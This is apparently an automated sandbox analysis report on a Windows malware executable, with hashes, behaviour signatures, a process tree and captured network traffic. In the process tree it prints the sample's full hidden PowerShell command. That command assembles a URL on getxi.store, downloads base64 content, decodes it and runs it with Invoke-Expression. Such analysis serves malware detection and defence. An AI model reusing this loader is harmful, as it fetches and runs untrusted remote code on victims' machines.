Analysis

  • max time kernel
    102s
  • max time network
    120s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20/03/2025, 20:20 UTC

General

  • Target

    void/257ffa778469d570082f7cfff1ad199a9bffffc278e9c012bea17d02393b95b4.exe

  • Size

    214KB

  • MD5

    561535d4ea4f26088f5bb93c0261be4b

  • SHA1

    5e5b7ff4650caaf0dd556e2e62154c60986a2681

  • SHA256

    257ffa778469d570082f7cfff1ad199a9bffffc278e9c012bea17d02393b95b4

  • SHA512

    772edd0ae2427b8b87c9244ce43d70a24df19b1f3173cda91735bee41e1470d6b31728989bcdbfaaea03cbbd34d4803e3135dad074a11255e1021efa18485ed9

  • SSDEEP

    3072:xPiUbLW99ZIGfsic0GC0dOiN2OPeyZU+gcdtA74Lw4bit2t81lenOsv6fn3:xPiUbLW9lsZ0GC0dOUe/0Lw4tKhy6f3

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\void\257ffa778469d570082f7cfff1ad199a9bffffc278e9c012bea17d02393b95b4.exe
    "C:\Users\Admin\AppData\Local\Temp\void\257ffa778469d570082f7cfff1ad199a9bffffc278e9c012bea17d02393b95b4.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -WindowStyle Hidden -NoP -NonI -ExecutionPolicy Bypass -Command " $mode='getxi.'; $userAgent='gift-3.2'; $wallet='store'; $trading='/developer'; $AI='https://'; $developer=$AI+$mode+$wallet+$trading; $Response=Invoke-WebRequest -Uri $developer -UseBasicParsing -UserAgent $userAgent; $Content=$Response.Content; $t=$Content -replace '<[^>]*>', ''; $s=[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($t)); Invoke-Expression $s "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5616

Network

  • Country: US
    DNS
    getxi.store
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    getxi.store
    IN A
    Response
  • Country: US
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.ax-0001.ax-msedge.net
    g-bing-com.ax-0001.ax-msedge.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
  • Country: US
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid=
    Remote address:
    150.171.28.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=013E0D8EE46D6CC60720183BE5E66D1E; domain=.bing.com; expires=Tue, 14-Apr-2026 20:22:33 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 2DE1D73ACEA7415B85D98835807C43E7 Ref B: FRA31EDGE0508 Ref C: 2025-03-20T20:22:33Z
    date: Thu, 20 Mar 2025 20:22:32 GMT
  • Country: US
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid=
    Remote address:
    150.171.28.10:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=013E0D8EE46D6CC60720183BE5E66D1E
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=FGw6N5IcrQyxlvJyStGXH7mZDsy54Aps_5fgmFR4itw; domain=.bing.com; expires=Tue, 14-Apr-2026 20:22:33 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 4D8C83C899A94143955892930A769966 Ref B: FRA31EDGE0508 Ref C: 2025-03-20T20:22:33Z
    date: Thu, 20 Mar 2025 20:22:32 GMT
  • Country: US
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid=
    Remote address:
    150.171.28.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=013E0D8EE46D6CC60720183BE5E66D1E; MSPTC=FGw6N5IcrQyxlvJyStGXH7mZDsy54Aps_5fgmFR4itw
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: CCB64125A1DD44CAB0D7B3480D51483A Ref B: FRA31EDGE0508 Ref C: 2025-03-20T20:22:33Z
    date: Thu, 20 Mar 2025 20:22:32 GMT
  • Country: US
    DNS
    c.pki.goog
    Remote address:
    8.8.8.8:53
    Request
    c.pki.goog
    IN A
    Response
    c.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.180.3
  • Country: GB
    GET
    http://c.pki.goog/r/r1.crl
    Remote address:
    142.250.180.3:80
    Request
    GET /r/r1.crl HTTP/1.1
    Cache-Control: max-age = 3000
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
    Response
    HTTP/1.1 304 Not Modified
    Date: Thu, 20 Mar 2025 19:59:16 GMT
    Expires: Thu, 20 Mar 2025 20:49:16 GMT
    Age: 1457
    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
    Cache-Control: public, max-age=3000
    Vary: Accept-Encoding
  • 150.171.28.10:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid=
    tls, http2
    2.0kB
    9.4kB
    21
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid=

    HTTP Response

    204
  • 142.250.180.3:80
    http://c.pki.goog/r/r1.crl
    http
    384 B
    355 B
    4
    3

    HTTP Request

    GET http://c.pki.goog/r/r1.crl

    HTTP Response

    304
  • 8.8.8.8:53
    getxi.store
    dns
    powershell.exe
    57 B
    122 B
    1
    1

    DNS Request

    getxi.store

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    148 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    150.171.28.10
    150.171.27.10

  • 8.8.8.8:53
    c.pki.goog
    dns
    56 B
    107 B
    1
    1

    DNS Request

    c.pki.goog

    DNS Response

    142.250.180.3

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mqmtudja.h3s.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/5616-0-0x00007FFB04FD3000-0x00007FFB04FD5000-memory.dmp

    Filesize

    8KB

  • memory/5616-1-0x00000155EC770000-0x00000155EC792000-memory.dmp

    Filesize

    136KB

  • memory/5616-11-0x00007FFB04FD0000-0x00007FFB05A91000-memory.dmp

    Filesize

    10.8MB

  • memory/5616-12-0x00007FFB04FD0000-0x00007FFB05A91000-memory.dmp

    Filesize

    10.8MB

  • memory/5616-13-0x00007FFB04FD0000-0x00007FFB05A91000-memory.dmp

    Filesize

    10.8MB

  • memory/5616-14-0x00007FFB04FD0000-0x00007FFB05A91000-memory.dmp

    Filesize

    10.8MB

  • memory/5616-17-0x00007FFB04FD0000-0x00007FFB05A91000-memory.dmp

    Filesize

    10.8MB
